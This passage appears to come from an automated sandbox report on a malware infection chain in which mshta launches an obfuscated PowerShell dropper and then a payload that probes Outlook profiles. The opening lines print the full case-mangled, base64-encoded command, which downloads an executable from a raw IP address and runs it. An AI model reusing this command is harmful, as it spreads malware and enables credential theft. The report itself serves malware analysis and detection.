                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; iEx($(IEX('[SyStEM.teXt.encODiNG]'+[ChaR]58+[cHAR]0X3A+'Utf8.gETsTriNG([SYStEM.CoNvErt]'+[CHaR]0X3a+[chAR]58+'FROMbASE64STring('+[ChAR]34+'JG1xZ0doICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJlckRlZkluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlFtV1RvTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVXlILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMSix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENZYlJFKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYeFBHb1lmdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbXFnR2g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjIzMS4yMTEvMzExL2Nzc29zLmV4ZSIsIiRFTnY6QVBQREFUQVxjb3NzZS5leGUiLDAsMCk7c1RhcnQtc0xlZVAoMyk7aU52b2tlLWl0ZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxjb3NzZS5leGUi'+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cosse.exe "C:\Users\user\AppData\Roaming\cosse.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E10.tmp" "c:\Users\user\AppData\Local\Temp\qrkmxxq1\CSCA5EBD89D883B423C8D6CB33CF6463C44.TMP"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cosse.exe" Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\cosse.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Binary string: wntdll.pdbUGP source: cosse.exe, 00000006.00000003.962909230.0000000003570000.00000004.00001000.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.966284231.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cosse.exe, 00000006.00000003.962909230.0000000003570000.00000004.00001000.00020000.00000000.sdmp, cosse.exe, 00000006.00000003.966284231.00000000033F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: $Gr6C:\Users\user\AppData\Local\Temp\qrkmxxq1\qrkmxxq1.pdb source: powershell.exe, 00000003.00000002.975652053.000000000547A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.983878644.000000000798A000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C poWErSheLL -Ex ByPass -NoP -w 1 -C DeViCECReDENtialdEplOyment ; 